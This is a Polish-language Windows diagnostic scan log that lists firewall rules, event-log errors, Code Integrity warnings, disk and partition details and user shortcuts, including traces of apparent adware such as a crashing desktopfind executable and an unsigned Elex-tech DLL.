FirewallRules: [{EBBABBE5-D68C-4D8A-8420-303B9E729363}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
FirewallRules: [{325314E0-16EC-4632-AF92-5E1AF332B795}] => (Allow) F:\Winamp\winamp.exe
FirewallRules: [{03F7D6F0-0BF8-4E34-B133-CB1A196A5415}] => (Allow) F:\Winamp\winamp.exe
FirewallRules: [{771584C0-D2CA-4E8D-8FEC-485DC16835E8}] => (Allow) C:\Program Files (x86)\EaseUS\Todo Backup\bin\TbService.exe
FirewallRules: [{262EFE13-0DC1-4C65-97E2-A03D7040A3F0}] => (Allow) C:\Program Files (x86)\EaseUS\Todo Backup\bin\TbService.exe
FirewallRules: [{BB1B02B1-43FC-4B14-A55E-BC3088454A4A}] => (Allow) C:\Program Files (x86)\EaseUS\Todo Backup\bin\TBConsoleUI.exe
FirewallRules: [{E90A69A1-2860-408C-988D-927B9BB654DB}] => (Allow) C:\Program Files (x86)\EaseUS\Todo Backup\bin\TBConsoleUI.exe
FirewallRules: [{D62BA8F0-57E6-443B-807E-8F7F01227D66}] => (Allow) C:\Program Files (x86)\EaseUS\Todo Backup\bin\TodoBackupService.exe
FirewallRules: [{5067C1F1-DCA0-4294-9470-2E35309C24EC}] => (Allow) C:\Program Files (x86)\EaseUS\Todo Backup\bin\TodoBackupService.exe
FirewallRules: [{2B8C5D5D-069F-4EC3-A659-237965F6F73C}] => (Allow) C:\Program Files (x86)\EaseUS\Todo Backup\bin\Agent.exe
FirewallRules: [{E3C93929-D9EB-473C-B4B6-B8C1A5DA565D}] => (Allow) C:\Program Files (x86)\EaseUS\Todo Backup\bin\TodoBackupService.exe
FirewallRules: [{B44C8283-9DD7-4BEC-BDDB-6A9BF9C89E4B}] => (Allow) C:\Program Files (x86)\EaseUS\Todo Backup\bin\TodoBackupService.exe
FirewallRules: [TCP Query User{6E21CD9A-26DB-4299-B058-A168996A4930}F:\tlen7\tlen7.exe] => (Block) F:\tlen7\tlen7.exe
FirewallRules: [UDP Query User{7D468A42-D223-4474-B6CB-E941D07AAF93}F:\tlen7\tlen7.exe] => (Block) F:\tlen7\tlen7.exe
FirewallRules: [TCP Query User{4F09B8E0-F2A5-48EA-8EFB-9666396D6E24}C:\users\adam\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\adam\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [UDP Query User{53B3DA54-4886-4FAB-891F-C59A473061A8}C:\users\adam\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\adam\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [TCP Query User{193E00E6-9341-4ABD-9B7D-85C0A9178EA9}C:\program files (x86)\sopcast\sopcast.exe] => (Allow) C:\program files (x86)\sopcast\sopcast.exe
FirewallRules: [UDP Query User{A5AF745D-3E92-4B5C-BCE7-CEA694F233D2}C:\program files (x86)\sopcast\sopcast.exe] => (Allow) C:\program files (x86)\sopcast\sopcast.exe
FirewallRules: [TCP Query User{877869B7-2EDA-4DEB-9AF2-134921CDD2BA}C:\program files (x86)\mirc\mirc.exe] => (Allow) C:\program files (x86)\mirc\mirc.exe
FirewallRules: [UDP Query User{B8DB2278-40DE-4520-BB7D-CF73FE2AB72D}C:\program files (x86)\mirc\mirc.exe] => (Allow) C:\program files (x86)\mirc\mirc.exe
FirewallRules: [TCP Query User{05FF2CB4-4A39-4714-B9E7-017BC5EFAD58}F:\pro evolution soccer 2015\pes2015.exe] => (Allow) F:\pro evolution soccer 2015\pes2015.exe
FirewallRules: [UDP Query User{E1C9DD4C-2D1E-44ED-8DFD-C835A2BE635E}F:\pro evolution soccer 2015\pes2015.exe] => (Allow) F:\pro evolution soccer 2015\pes2015.exe
FirewallRules: [TCP Query User{54BC3699-D5AA-4A31-9AB0-213F89C0F58C}C:\users\adam\desktop\mirc.exe] => (Allow) C:\users\adam\desktop\mirc.exe
FirewallRules: [UDP Query User{4FFA3B8D-DC50-4B96-8756-D9BA4AA43B61}C:\users\adam\desktop\mirc.exe] => (Allow) C:\users\adam\desktop\mirc.exe
FirewallRules: [{B2D47BEA-2F9E-410E-B6AF-94035B0BEA77}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{23B5138E-21DE-4BD1-B9BD-0B409A767FEB}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{0C98439B-7596-47C2-8519-41CE3CDD6B13}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{158AB578-BD13-4DE4-8FF5-3CE97907E011}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{C184763A-666C-42B7-8F82-D451CD5B265A}] => (Allow) C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
FirewallRules: [{4802F74E-4E74-4C91-AABC-BC0E87B8ECC6}] => (Allow) C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
FirewallRules: [{92657373-B5E0-4FDE-8451-A8ECBCE38C5B}] => (Allow) C:\Users\Adam\AppData\Roaming\ACEStream\engine\ace_engine.exe
FirewallRules: [{61B2273F-4F6D-4D33-B814-3511975766F9}] => (Allow) C:\Users\Adam\AppData\Roaming\ACEStream\engine\ace_engine.exe
FirewallRules: [{73518430-4B83-4489-9CDA-B3D7461ED607}] => (Allow) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.590_0\SZBrowser.exe
FirewallRules: [TCP Query User{9D787771-E338-4BAB-8A85-2B71161CAF76}C:\users\adam\appdata\roaming\octoshape\octoshape streaming services\infinitemediaacceleration.exe] => (Allow) C:\users\adam\appdata\roaming\octoshape\octoshape streaming services\infinitemediaacceleration.exe
FirewallRules: [UDP Query User{4EE77434-A56F-496F-BED4-D8958E47D7A2}C:\users\adam\appdata\roaming\octoshape\octoshape streaming services\infinitemediaacceleration.exe] => (Allow) C:\users\adam\appdata\roaming\octoshape\octoshape streaming services\infinitemediaacceleration.exe
FirewallRules: [{2C22CD0C-A50C-4F39-AC45-AF0DA66196A7}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{BC35CE9E-4D96-4B5F-A8BB-D6079AD556F3}] => (Allow) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.596\SZBrowser.exe
FirewallRules: [{45E1A9CB-3A83-405D-A7A1-1467833BDE58}] => (Allow) C:\Program Files (x86)\Eastness\Application\chrome.exe
FirewallRules: [{0622DF48-9942-4C07-8A38-969F01B16F50}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{4DB7B6EB-50A0-49FE-8C66-D2330DD0CDC4}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
FirewallRules: [TCP Query User{D89F6509-DFB3-44F8-AC4D-0F4344665175}C:\users\adam\appdata\roaming\acestream\engine\ace_engine.exe] => (Block) C:\users\adam\appdata\roaming\acestream\engine\ace_engine.exe
FirewallRules: [UDP Query User{15FD8BF2-A41D-4CB2-93E9-187F5803419E}C:\users\adam\appdata\roaming\acestream\engine\ace_engine.exe] => (Block) C:\users\adam\appdata\roaming\acestream\engine\ace_engine.exe
FirewallRules: [{7878A59F-637A-4176-8A1A-F065B7E6A7EA}] => (Allow) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
FirewallRules: [{E32899BB-DB0B-4992-885D-1DE33CD6200D}] => (Allow) C:\Program Files (x86)\MIO\loader\st1000dm003-1er162_z4y42ghsxxxxz4y42ghs.dat
FirewallRules: [{5818BB2E-18C6-4808-9E91-566A6BEE8ED8}] => (Allow) C:\Program Files (x86)\MIO\loader\st1000dm003-1er162_z4y42ghsxxxxz4y42ghs.dat
FirewallRules: [{BC15C403-515B-4FA8-B9C1-A39AF2540D0F}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{3E68DC6F-3F08-4908-95DB-6F555ACA88E8}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe

==================== Punkty Przywracania systemu =========================

06-04-2017 11:46:14 Zaplanowany punkt kontrolny
14-04-2017 10:44:45 Zaplanowany punkt kontrolny
22-04-2017 17:16:38 Zaplanowany punkt kontrolny

==================== Wadliwe urządzenia w Menedżerze urządzeń =============


==================== Błędy w Dzienniku zdarzeń: =========================

Dziennik Aplikacja:
==================
Error: (04/21/2017 10:52:26 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nazwa aplikacji powodującej błąd: adwcleaner_6.045.exe, wersja: 6.0.4.5, sygnatura czasowa: 0x58da8d8e
Nazwa modułu powodującego błąd: adwcleaner_6.045.exe, wersja: 6.0.4.5, sygnatura czasowa: 0x58da8d8e
Kod wyjÄ…tku: 0xc0000005
Przesunięcie błędu: 0x00020fea
Identyfikator procesu powodującego błąd: 0x1104
Godzina uruchomienia aplikacji powodującej błąd: 0x01d2ba7a8c1165df
Ścieżka aplikacji powodującej błąd: F:\wiro\adwcleaner_6.045.exe
Ścieżka modułu powodującego błąd: F:\wiro\adwcleaner_6.045.exe
Identyfikator raportu: d732504f-266f-11e7-8345-d8cb8a1d695b
Pełna nazwa pakietu powodującego błąd:
Identyfikator aplikacji względem pakietu powodującego błąd:

Error: (04/21/2017 09:23:39 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nazwa aplikacji powodującej błąd: desktop254.exe, wersja: 1.0.0.10, sygnatura czasowa: 0x56e96567
Nazwa modułu powodującego błąd: desktop254.exe, wersja: 1.0.0.10, sygnatura czasowa: 0x56e96567
Kod wyjÄ…tku: 0xc0000409
Przesunięcie błędu: 0x00013ce7
Identyfikator procesu powodującego błąd: 0x6d8
Godzina uruchomienia aplikacji powodującej błąd: 0x01d2ba6fcb2414e5
Ścieżka aplikacji powodującej błąd: C:\ProgramData\desktopfind\desktop254.exe
Ścieżka modułu powodującego błąd: C:\ProgramData\desktopfind\desktop254.exe
Identyfikator raportu: 7063d5a1-2663-11e7-8345-d8cb8a1d695b
Pełna nazwa pakietu powodującego błąd:
Identyfikator aplikacji względem pakietu powodującego błąd:

Error: (04/20/2017 02:51:57 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Program IEXPLORE.EXE w wersji 11.0.9600.18124 przestał współpracować z systemem Windows i został zamknięty. Aby sprawdzić, czy jest dostępnych więcej informacji na temat tego problemu, sprawdź historię problemu w aplecie Centrum akcji w Panelu sterowania.

Identyfikator procesu: 1b2c

Godzina rozpoczęcia: 01d2b9d4bfb684cf

Godzina zakończenia: 7

ĹšcieĹĽka aplikacji: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Identyfikator raportu: 20b627c8-25c8-11e7-8344-d8cb8a1d695b

Pełna nazwa pakietu powodującego błąd:

Identyfikator aplikacji względem pakietu powodującego błąd:

Error: (04/20/2017 02:18:09 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nazwa aplikacji powodującej błąd: desktop254.exe, wersja: 1.0.0.10, sygnatura czasowa: 0x56e96567
Nazwa modułu powodującego błąd: desktop254.exe, wersja: 1.0.0.10, sygnatura czasowa: 0x56e96567
Kod wyjÄ…tku: 0xc0000409
Przesunięcie błędu: 0x00013ce7
Identyfikator procesu powodującego błąd: 0x748
Godzina uruchomienia aplikacji powodującej błąd: 0x01d2b9cfe11cdac3
Ścieżka aplikacji powodującej błąd: C:\ProgramData\desktopfind\desktop254.exe
Ścieżka modułu powodującego błąd: C:\ProgramData\desktopfind\desktop254.exe
Identyfikator raportu: 6a2281ac-25c3-11e7-8344-d8cb8a1d695b
Pełna nazwa pakietu powodującego błąd:
Identyfikator aplikacji względem pakietu powodującego błąd:

Error: (04/18/2017 10:11:50 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nazwa aplikacji powodującej błąd: desktop254.exe, wersja: 1.0.0.10, sygnatura czasowa: 0x56e96567
Nazwa modułu powodującego błąd: desktop254.exe, wersja: 1.0.0.10, sygnatura czasowa: 0x56e96567
Kod wyjÄ…tku: 0xc0000409
Przesunięcie błędu: 0x00013ce7
Identyfikator procesu powodującego błąd: 0x12c
Godzina uruchomienia aplikacji powodującej błąd: 0x01d2b87fa421b580
Ścieżka aplikacji powodującej błąd: C:\ProgramData\desktopfind\desktop254.exe
Ścieżka modułu powodującego błąd: C:\ProgramData\desktopfind\desktop254.exe
Identyfikator raportu: 4138dfb7-2473-11e7-8343-d8cb8a1d695b
Pełna nazwa pakietu powodującego błąd:
Identyfikator aplikacji względem pakietu powodującego błąd:

Error: (04/17/2017 04:38:07 PM) (Source: ATIeRecord) (EventID: 16390) (User: )
Description: ATI EEU waiting for an event has failed

Error: (04/17/2017 03:13:26 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nazwa aplikacji powodującej błąd: chrome.exe, wersja: 57.0.2987.133, sygnatura czasowa: 0x58dae36d
Nazwa modułu powodującego błąd: ntdll.dll, wersja: 6.3.9600.18146, sygnatura czasowa: 0x5650afd4
Kod wyjÄ…tku: 0xc0000018
Przesunięcie błędu: 0x0009d572
Identyfikator procesu powodującego błąd: 0x159c
Godzina uruchomienia aplikacji powodującej błąd: 0x01d2b77c65f4b53a
Ścieżka aplikacji powodującej błąd: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Ścieżka modułu powodującego błąd: C:\Windows\SYSTEM32\ntdll.dll
Identyfikator raportu: a3b4b549-236f-11e7-8342-d8cb8a1d695b
Pełna nazwa pakietu powodującego błąd:
Identyfikator aplikacji względem pakietu powodującego błąd:

Error: (04/13/2017 06:01:05 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nazwa aplikacji powodującej błąd: desktop254.exe, wersja: 1.0.0.10, sygnatura czasowa: 0x56e96567
Nazwa modułu powodującego błąd: desktop254.exe, wersja: 1.0.0.10, sygnatura czasowa: 0x56e96567
Kod wyjÄ…tku: 0xc0000409
Przesunięcie błędu: 0x00013ce7
Identyfikator procesu powodującego błąd: 0x76c
Godzina uruchomienia aplikacji powodującej błąd: 0x01d2b46eddb7d053
Ścieżka aplikacji powodującej błąd: C:\ProgramData\desktopfind\desktop254.exe
Ścieżka modułu powodującego błąd: C:\ProgramData\desktopfind\desktop254.exe
Identyfikator raportu: 65c9e9c2-2062-11e7-8342-d8cb8a1d695b
Pełna nazwa pakietu powodującego błąd:
Identyfikator aplikacji względem pakietu powodującego błąd:

Error: (04/12/2017 09:11:39 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nazwa aplikacji powodującej błąd: chrome.exe, wersja: 57.0.2987.133, sygnatura czasowa: 0x58dae36d
Nazwa modułu powodującego błąd: ntdll.dll, wersja: 6.3.9600.18146, sygnatura czasowa: 0x5650afd4
Kod wyjÄ…tku: 0xc0000018
Przesunięcie błędu: 0x0009d572
Identyfikator procesu powodującego błąd: 0x78c
Godzina uruchomienia aplikacji powodującej błąd: 0x01d2b35c0763e14a
Ścieżka aplikacji powodującej błąd: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Ścieżka modułu powodującego błąd: C:\Windows\SYSTEM32\ntdll.dll
Identyfikator raportu: 452a348d-1f4f-11e7-8341-d8cb8a1d695b
Pełna nazwa pakietu powodującego błąd:
Identyfikator aplikacji względem pakietu powodującego błąd:

Error: (03/22/2017 02:34:43 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nazwa aplikacji powodującej błąd: desktop254.exe, wersja: 1.0.0.10, sygnatura czasowa: 0x56e96567
Nazwa modułu powodującego błąd: desktop254.exe, wersja: 1.0.0.10, sygnatura czasowa: 0x56e96567
Kod wyjÄ…tku: 0xc0000409
Przesunięcie błędu: 0x00013ce7
Identyfikator procesu powodującego błąd: 0x760
Godzina uruchomienia aplikacji powodującej błąd: 0x01d2a30866d68d8d
Ścieżka aplikacji powodującej błąd: C:\ProgramData\desktopfind\desktop254.exe
Ścieżka modułu powodującego błąd: C:\ProgramData\desktopfind\desktop254.exe
Identyfikator raportu: ecad89f0-0efb-11e7-8341-d8cb8a1d695b
Pełna nazwa pakietu powodującego błąd:
Identyfikator aplikacji względem pakietu powodującego błąd:


Dziennik System:
=============
Error: (04/21/2017 11:02:48 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Usługa Apple Notifications Service zakończyła działanie; wystąpił następujący błąd:
Nie można odnaleźć określonego modułu.

Error: (04/21/2017 11:00:34 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Nie można uruchomić usługi McAfee Service Controller z powodu następującego błędu:
Nie można odnaleźć określonego pliku.

Error: (04/21/2017 11:00:23 AM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \SystemRoot\SysWow64\drivers\pfc.sys

Error: (04/21/2017 10:58:41 AM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: Menedżer sterowania usługami próbował podjąć akcję korekcyjną (Uruchom usługę ponownie) po nieoczekiwanym zakończeniu usługi Windows Search, ale ta akcja nie powiodła się przy następującym błędzie:
Jedno wystąpienie usługi już działa.
.

Error: (04/21/2017 10:58:12 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Usługa Dysk wirtualny niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. W przeciągu 60000 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie.

Error: (04/21/2017 10:58:12 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Usługa Usługa udostępniania w sieci programu Windows Media Player niespodziewanie zakończyła pracę. Wystąpiło to razy: 2. W przeciągu 30000 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie.

Error: (04/21/2017 10:58:11 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Usługa Bufor wydruku niespodziewanie zakończyła pracę. Wystąpiło to razy: 2. W przeciągu 5000 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie.

Error: (04/21/2017 10:58:11 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Usługa Windows Search niespodziewanie zakończyła pracę. Wystąpiło to razy: 2. W przeciągu 30000 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie.

Error: (04/21/2017 10:58:11 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Usługa Intel(R) Capability Licensing Service Interface niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. W przeciągu 0 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie.

Error: (04/21/2017 10:48:13 AM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: Menedżer sterowania usługami próbował podjąć akcję korekcyjną (Uruchom usługę ponownie) po nieoczekiwanym zakończeniu usługi Windows Search, ale ta akcja nie powiodła się przy następującym błędzie:
Jedno wystąpienie usługi już działa.
.


CodeIntegrity:
===================================
  Date: 2017-04-21 10:35:27.587
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-04-21 09:32:20.867
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-04-21 09:25:08.869
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-04-21 09:25:08.734
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-04-20 14:30:37.404
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-04-20 14:30:37.400
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-04-20 11:45:55.176
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-04-20 11:45:55.176
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-04-20 11:16:44.011
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-04-20 11:16:44.010
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.


==================== Statystyki pamięci ===========================

Procesor: Intel(R) Core(TM) i5-4440 CPU @ 3.10GHz
Procent pamięci w użyciu: 45%
Całkowita pamięć fizyczna: 8136.02 MB
Dostępna pamięć fizyczna: 4432.92 MB
Całkowita pamięć wirtualna: 9416.02 MB
Dostępna pamięć wirtualna: 4948.79 MB

==================== Dyski ================================

Drive c: (System) (Fixed) (Total:149.92 GB) (Free:62.57 GB) NTFS
Drive f: (Programy) (Fixed) (Total:313.26 GB) (Free:177.91 GB) NTFS

==================== MBR & Tablica partycji ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 16C9E122)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=149.9 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=313.3 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=468 GB) - (Type=05)

==================== Koniec  Addition.txt ============================

Shortcut
Kod: Zaznacz wszystko
Rezultat skanowania skrĂłtĂłw uĹĽytkownikĂłw (x64) Wersja: 22-04-2017 01
Uruchomiony przez Adam (22-04-2017 22:14:23)
Uruchomiony z F:\wiro
Tryb startu: Normal

==================== SkrĂłty =============================

(Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.)



Shortcut: C:\Users\Admin_KTR\Desktop\Unigine-Heaven25.lnk -> \\10.21.64.199\programy$\Unigine\HeavenBenchmark25.bat
Shortcut: C:\Users\Admin_KTR\Desktop\Unigine-Heaven30.lnk -> \\10.21.64.199\programy$\Unigine\HeavenBenchmark30.bat
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Unigine\Valley Benchmark 1.0\Valley Benchmark 1.0.lnk -> C:\Program Files (x86)\Unigine\Valley Benchmark 1.0\valley.bat ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Unigine\Heaven Benchmark 4.0\Heaven Benchmark 4.0.lnk -> C:\Program Files (x86)\Unigine\Heaven Benchmark 4.0\heaven.bat ()
Shortcut: C:\Users\Public\Desktop\Heaven Benchmark 4.0.lnk -> C:\Program Files (x86)\Unigine\Heaven Benchmark 4.0\heaven.bat ()
Shortcut: C:\Users\Public\Desktop\Valley Benchmark 1.0.lnk -> C:\Program Files (x86)\Unigine\Valley Benchmark 1.0\valley.bat ()


Shortcut: C:\Users\Adam\SkyDrive\RecentPlaces.lnk -> [::{22877A6D-37A1-461A-91B0-DBDA5AAEBC99}]
Shortcut: C:\Users\Adam\Links\Desktop.lnk -> C:\Users\Adam\Desktop ()
Shortcut: C:\Users\Adam\Links\Downloads.lnk -> C:\Users\Adam\Downloads ()
Shortcut: C:\Users\Adam\Links\Dropbox.lnk -> C:\Users\Adam\Dropbox ()
Shortcut: C:\Users\Adam\Links\GG dysk.lnk -> C:\Users\Adam\GG dysk ()
Shortcut: C:\Users\Adam\Favorites\GG dysk.lnk -> C:\Users\Adam\GG dysk ()
Shortcut: C:\Users\Adam\Downloads\Obrazy — skrót.lnk -> C:\Users\Adam\Pictures ()
Shortcut: C:\Users\Adam\Desktop\Ace Player.lnk -> C:\Users\Adam\AppData\Roaming\ACEStream\player\ace_player.exe (Brak pliku)
Shortcut: C:\Users\Adam\Desktop\Ace Stream Media Center.lnk -> C:\Users\Adam\AppData\Roaming\ACEStream\engine\ace_engine.exe (Brak pliku)
Shortcut: C:\Users\Adam\Desktop\AION.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
Shortcut: C:\Users\Adam\Desktop\Continue 3DMark installation.lnk -> C:\Users\Adam\AppData\Local\Temp\ICReinstall_3DMark(39020)-dp.exe (Brak pliku)
Shortcut: C:\Users\Adam\Desktop\Core Temp.lnk -> C:\Program Files\Core Temp\Core Temp.exe ()
Shortcut: C:\Users\Adam\Desktop\DSJ4.lnk -> F:\Deluxe Ski Jump 4\DSJ4.exe (Mediamond Tmi)
Shortcut: C:\Users\Adam\Desktop\GG dysk.lnk -> C:\Users\Adam\GG dysk ()
Shortcut: C:\Users\Adam\Desktop\GG.lnk -> C:\Users\Adam\AppData\Local\GG\Application\gghub.exe (GG Network S.A.)
Shortcut: C:\Users\Adam\Desktop\HD Tune.lnk -> C:\Program Files (x86)\HD Tune\HDTune.exe (EFD Software)
Shortcut: C:\Users\Adam\Desktop\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
Shortcut: C:\Users\Adam\Desktop\IrfanView.lnk -> C:\Program Files (x86)\IrfanView\i_view32.exe (Irfan Skiljan)
Shortcut: C:\Users\Adam\Desktop\Komunikator Tlen.pl.lnk -> F:\Tlen7\tlen7.exe ()
Shortcut: C:\Users\Adam\Desktop\MSI Afterburner.lnk -> C:\Program Files (x86)\MSI Afterburner\MSIAfterburner.exe ()
Shortcut: C:\Users\Adam\Desktop\MSI GamingApp.lnk -> C:\Program Files (x86)\MSI\MSI GamingApp\MSIGamingApp.exe (Micro-Star International Co., Ltd.)
Shortcut: C:\Users\Adam\Desktop\OpenFM.lnk -> C:\Users\Adam\AppData\Local\OpenFM\Application\openfm.exe (Mozilla Foundation)
Shortcut: C:\Users\Adam\Desktop\PhotoScape.lnk -> C:\Program Files (x86)\PhotoScape\PhotoScape.exe ()
Shortcut: C:\Users\Adam\Desktop\SopCast.lnk -> C:\Program Files (x86)\SopCast\SopCast.exe (http://www.sopcast.com)
Shortcut: C:\Users\Adam\Desktop\SpeedFan.lnk -> C:\Program Files (x86)\SpeedFan\speedfan.exe (Almico Software (almico.com))
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Komunikator Tlen.pl.lnk -> F:\Tlen7\tlen7.exe ()
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\GG.lnk -> C:\Users\Adam\AppData\Local\GG\Application\gghub.exe (GG Network S.A.)
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OpenFM.lnk -> C:\Users\Adam\AppData\Local\OpenFM\Application\openfm.exe (Mozilla Foundation)
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR\Co nowego w ostatniej wersji.lnk -> C:\Program Files\WinRAR\CoNowego.txt ()
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR\Podręcznik RARa dla konsoli.lnk -> C:\Program Files\WinRAR\Rar.txt ()
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR\Pomoc WinRARa.lnk -> C:\Program Files\WinRAR\WinRAR.chm ()
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR\WinRAR.lnk -> C:\Program Files\WinRAR\WinRAR.exe (Alexander Roshal)
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Command Prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\computer.lnk -> C:\Windows\explorer.exe,-30
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Control Panel.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\File Explorer.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Help.lnk -> C:\Windows\HelpPane.exe (Microsoft Corporation)
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Run.lnk -> C:\Windows\System32\shell32.dll (Microsoft Corporation)
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Windows.Defender.lnk -> C:\Program Files\Windows Defender\MSASCui.exe (Microsoft Corporation)
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpeedFan\Help and HOW-TO.lnk -> C:\Program Files (x86)\SpeedFan\speedfan.chm ()
